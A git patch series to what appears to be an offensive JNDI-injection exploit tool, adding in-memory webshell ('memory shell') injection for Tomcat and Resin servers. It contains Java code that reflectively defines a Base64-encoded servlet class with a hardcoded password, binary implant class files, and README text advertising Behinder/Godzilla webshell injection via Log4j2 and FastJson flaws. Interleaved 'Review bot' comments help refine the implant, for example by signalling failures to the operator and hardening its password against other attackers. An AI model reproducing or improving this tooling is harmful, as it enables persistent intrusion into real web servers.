From d1dc6e42bf15da9d59429ee7bcaba4af2f09f0e8 Mon Sep 17 00:00:00 2001
From: SearchNull <43846937@qq.com>
Date: Wed, 19 Jan 2022 11:50:10 +0800
Subject: [PATCH 1/3] add ShortMemShell and resin middleware
---
 src/main/java/io/github/exp1orer/StartUp.java | 17 +++---
 .../io/github/exp1orer/util/MemoryShell.java | 50 +++++++++++++++++-
 src/main/resources/ResinMemShellServlet.class | Bin 0 -> 2428 bytes
 src/main/resources/ShortMemShellFilter.class | Bin 0 -> 8512 bytes
 src/main/resources/ShortMemShellServlet.class | Bin 0 -> 12135 bytes
 5 files changed, 57 insertions(+), 10 deletions(-)
 create mode 100644 src/main/resources/ResinMemShellServlet.class
 create mode 100644 src/main/resources/ShortMemShellFilter.class
 create mode 100644 src/main/resources/ShortMemShellServlet.class
diff --git a/src/main/java/io/github/exp1orer/StartUp.java b/src/main/java/io/github/exp1orer/StartUp.java
index 0ec2b09..f08b24d 100644
--- a/src/main/java/io/github/exp1orer/StartUp.java
+++ b/src/main/java/io/github/exp1orer/StartUp.java
@@ -89,12 +89,15 @@ public class StartUp {
 String[] proxies = options.get("proxy").split(":", 2);
 proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxies[0], Integer.parseInt(proxies[1])));
 }
- memoryShell.add("BehinderFilter");
- memoryShell.add("BehinderServlet");
- memoryShell.add("GodzillaFilter");
- memoryShell.add("GodzillaServlet");
- memoryShell.add("NeoreGeorgFilter");
- memoryShell.add("NeoreGeorgServlet");
+ memoryShell.add("TomcatBehinderFilter");
+ memoryShell.add("TomcatBehinderServlet");
+ memoryShell.add("TomcatGodzillaFilter");
+ memoryShell.add("TomcatGodzillaServlet");
+ memoryShell.add("TomcatNeoreGeorgFilter");
+ memoryShell.add("TomcatNeoreGeorgServlet");
+ memoryShell.add("TomcatShortMemShellFilter");
+ memoryShell.add("TomcatShortMemShellServlet");
+ memoryShell.add("ResinShortMemShellServlet");
 try {
 Class.forName("io.github.exp1orer.util.Config");
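Review bot: The new entry `ResinShortMemShellServlet` does not match the key that MemoryShell.java dispatches on (`"ResinMemShellServlet".equals(name)`), nor the bundled resource `ResinMemShellServlet.class`, while the Tomcat entries apparently only gain a `Tomcat` prefix over the resource names they load (`ShortMemShellFilter.class`, `ShortMemShellServlet.class`). Unless prefix-stripping code outside this diff maps `ResinShortMemShellServlet` to `ResinMemShellServlet`, selecting the Resin option falls through to the Tomcat branch and builds a Tomcat payload for a Resin target, with no error. Spelling the name identically in both places, e.g. `memoryShell.add("ResinMemShellServlet");`, or sharing a single constant between StartUp and MemoryShell, would remove the silent mismatch. The enclosing method begins before and ends after this hunk.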
@@ -283,7 +286,6 @@ public class StartUp {
 * @author: SearchNull
 */
 private static boolean checkCommandEcho() {
- String line;
 String respContent;
 String uuid = UUID.randomUUID().toString();
 String command = "echo " + uuid;
@@ -338,7 +340,6 @@ public class StartUp {
 * @author: SearchNull
 */
 private static boolean runCommand(int index, String command) {
- String line;
 String respContent;
 if (headers == null) {
 headers = new HashMap();
diff --git a/src/main/java/io/github/exp1orer/util/MemoryShell.java b/src/main/java/io/github/exp1orer/util/MemoryShell.java
index 05bb5e6..95407ac 100644
--- a/src/main/java/io/github/exp1orer/util/MemoryShell.java
+++ b/src/main/java/io/github/exp1orer/util/MemoryShell.java
@@ -8,6 +8,7 @@ import java.util.Base64;
 public class MemoryShell {
 private static MemoryShell instance = new MemoryShell();
+ private static String className = "";
 private MemoryShell() {}
@@ -20,7 +21,11 @@ public class MemoryShell {
 return "";
 }
- return instance.tomcatMemoryShell(name + ".class");
+ if ("ResinMemShellServlet".equals(name)) {
+ return instance.resinMemoryShell(name);
+ } else {
+ return instance.tomcatMemoryShell(name + ".class");
+ }
 }
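Review bot: The Resin branch hands `resinMemoryShell` the bare `name` and leaves the callee to append `.class`, while the Tomcat branch appends it at the call site, so the resource lookup now follows two conventions in the same `if`. Passing the resource name in both branches, `return instance.resinMemoryShell(name + ".class");`, and having `resinMemoryShell` call `renameClass("User", name)` makes the two paths read alike; the `else` after a `return` can also go in favour of a guard clause. The signature of the enclosing method is outside the hunk, so whether `name` has already been normalised is not visible here.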
@@ -90,6 +95,46 @@ public class MemoryShell { return code; } + private String resinMemoryShell(String name) { + String payload = renameClass("User", name + ".class"); + String code = String.format("try {\n" + + " Class si = Thread.currentThread().getContextClassLoader().loadClass(\"com.caucho.server.dispatch\" + \".ServletInvocation\");\n" + + " java.lang.reflect.Method getContextRequest = si.getMethod(\"getContextRequest\");\n" + + " javax.servlet.ServletRequest contextRequest = (javax.servlet.ServletRequest ) getContextRequest.invoke(null);\n" + + " com.caucho.server.http.HttpServletRequestImpl req = (com.caucho.server.http.HttpServletRequestImpl ) contextRequest;\n" + + " javax.servlet.http.HttpServletResponse rep = (javax.servlet.http.HttpServletResponse) req.getServletResponse();" + + " java.io.PrintWriter out = rep.getWriter();" + + " javax.servlet.http.HttpSession session = req.getSession();\n" + + " String path = req.getHeader(\"path\") != null ? req.getHeader(\"path\") : \"/favicondemo.ico\";\n" + + " String pwd = req.getHeader(\"p\") != null ? 
req.getHeader(\"p\") : \"pass1024\";\n" + + "\n" + + " java.lang.reflect.Method getServletContext = javax.servlet.ServletRequest.class.getMethod(\"getServletContext\");\n" + + " Object web =getServletContext.invoke(contextRequest);\n" + + "\n" + + " com.caucho.server.webapp.WebApp web1 = (com.caucho.server.webapp.WebApp ) web;\n" + + "\n" + + " com.caucho.server.dispatch.ServletMapping smapping = new com.caucho.server.dispatch.ServletMapping();\n" + + "\n" + + " String s1=\"%s\";" + + " byte[] bytes1 = java.util.Base64.getDecoder().decode(s1.getBytes());\n" + + "\n" + + " java.lang.reflect.Method m = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{String.class, byte[].class, int.class, int.class});\n" + + " m.setAccessible(true);\n" + + " m.setAccessible(true);\n" + + " m.invoke(ClassLoader.getSystemClassLoader(), new Object[]{\"%s\", bytes1, 0, bytes1.length});\n" + + " session.setAttribute(\"u\", pwd);\n" + + " smapping.setServletClass(\"%s\");\n" + + " smapping.setServletName(\"%s\");\n" + + " smapping.addURLPattern(path);\n" + + " web1.addServletMapping(smapping);\n" + + " out.println(\"->|Success|<-\");" + + "} catch (Exception e) {\n" + + " e.printStackTrace();\n" + + "}", payload, className, className, className); + + return code; + } + private String renameClass(String prefix, String resourceName) { String bytecodes = ""; ClassPool pool = ClassPool.getDefault(); @@ -100,7 +145,8 @@ public class MemoryShell { try { CtClass ctClass = pool.makeClass(is); - ctClass.setName(prefix + System.nanoTime()); + className = prefix + System.nanoTime(); + ctClass.setName(className); byte[] bytes = ctClass.toBytecode(); bytecodes = Base64.getEncoder().encodeToString(bytes); } catch (IOException | CannotCompileException e) { 
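Review bot: In the generated payload of `resinMemoryShell`, `m.setAccessible(true);` is emitted twice, and the `catch` block only calls `e.printStackTrace()`, which writes the failure into the Resin process's stderr/log and gives the operator no signal in the HTTP response; a line mirroring the success marker, `out.println("->|Fail|<-" + e);`, would make a failed injection observable without touching the server log. The defaults `pass1024` and `/favicondemo.ico` are baked into every payload, so any third party who knows this tool can drive an implant installed with the defaults; deriving the default from a per-run random value (the way the class name already uses `System.nanoTime()`) or requiring the `p` header would close that. Whether `ClassLoader.getSystemClassLoader()` can resolve the `javax.servlet` types the injected servlet references depends on the target's Resin classpath and cannot be verified from this diff. The method is complete within the hunk.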
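Review bot: `renameClass` now records the generated class name in the static `className` field as a side effect instead of returning it, and because the field lives on a singleton and `renameClass` is called from both the Tomcat and Resin paths, whoever reads `className` afterwards sees whatever the most recent invocation wrote rather than the name belonging to the bytecode they were handed. Returning the name together with the bytecode (a two-element `String[]` or a tiny holder class) keeps the data flow explicit and thread-safe, and the static field can then be dropped. The method's signature and the `try` that this hunk continues sit in the preceding hunk.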
diff --git a/src/main/resources/ResinMemShellServlet.class b/src/main/resources/ResinMemShellServlet.class new file mode 100644 index 0000000000000000000000000000000000000000..910e691feba37c80b35b666f0ed11fa0a9eafb64 GIT binary patch literal 2428 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 aCLBue`(zF9>AP|bzExVra;@6wAN(KAhvmZn literal 0 HcmV?d00001 
diff --git a/src/main/resources/ShortMemShellServlet.class b/src/main/resources/ShortMemShellServlet.class new file mode 100644 index 0000000000000000000000000000000000000000..3278d5303662844be20c40e781b75c6f75107387 GIT binary patch literal 12135 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 Date: Wed, 19 Jan 2022 14:50:10 +0800 Subject: [PATCH 2/3] Update README.md --- README.md | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 3de2402..4d7196b 100644 --- a/README.md +++ b/README.md 
@@ -6,6 +6,13 @@ > > Solve the high version of JDK Bypass, like FastJson, Jackson, Log4j2, native JNDI injection vulnerabilities, and detect locally available deserialization gadgets to achieve command execution, echo command execution, and memory shell injection +## Support + +- 本地gadget探测 +- 回显命令执行 +- Tomcat中间件注入冰蝎/哥斯拉流量加密Webshell内存马 +- Tomcat/Resin 一句话内存马 + ## Usage ```shell @@ -92,7 +99,7 @@ java -jar JNDI-Inject-Exploit-0.1-all.jar ip="192.168.0.104" url="http://192.168 ![](https://searchnull-image.oss-cn-shenzhen.aliyuncs.com/20211226142236.png) -**可利用Gadget信息,如名称中带有 `[TomcatEcho]` 等字样则表示该Gadget可利用且能够回显命令执行,如名称中带有 `BehinderFilter` 、`GodzillaFilter` 字样则表示支持注入冰蝎内存马或哥斯拉内存马** +**可利用Gadget信息,如名称中带有 `[TomcatEcho]` 等字样则表示该Gadget可利用且能够回显命令执行,如名称中带有 `TomcatBehinderFilter` 、`TomcatGodzillaFilter` 字样则表示支持在Tomcat中间件中注入冰蝎内存马或哥斯拉内存马(支持该功能不代表一定能够注入成功)** ![](https://searchnull-image.oss-cn-shenzhen.aliyuncs.com/20211226142317.png) From 4c0f310c8ed2ccba1c8715509aca00410bf06467 Mon Sep 17 00:00:00 2001 From: SearchNull <43846937@qq.com> Date: Wed, 19 Jan 2022 15:08:35 +0800 Subject: [PATCH 3/3] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 4d7196b..ec9834a 100644 --- a/README.md +++ b/README.md @@ -13,6 +13,12 @@ - Tomcat中间件注入冰蝎/哥斯拉流量加密Webshell内存马 - Tomcat/Resin 一句话内存马 +## Test + +漏洞环境请转至 v0.3 Version Releases处下载,运行 `springWithLog4j-1.0-SNAPSHOT.jar` 会在8190端口运行服务,访问首页的超链接后的id参数中存在 `Log4j2`漏洞。 + +![](https://searchnull-image.oss-cn-shenzhen.aliyuncs.com/20220119150756.png) + ## Usage ```shell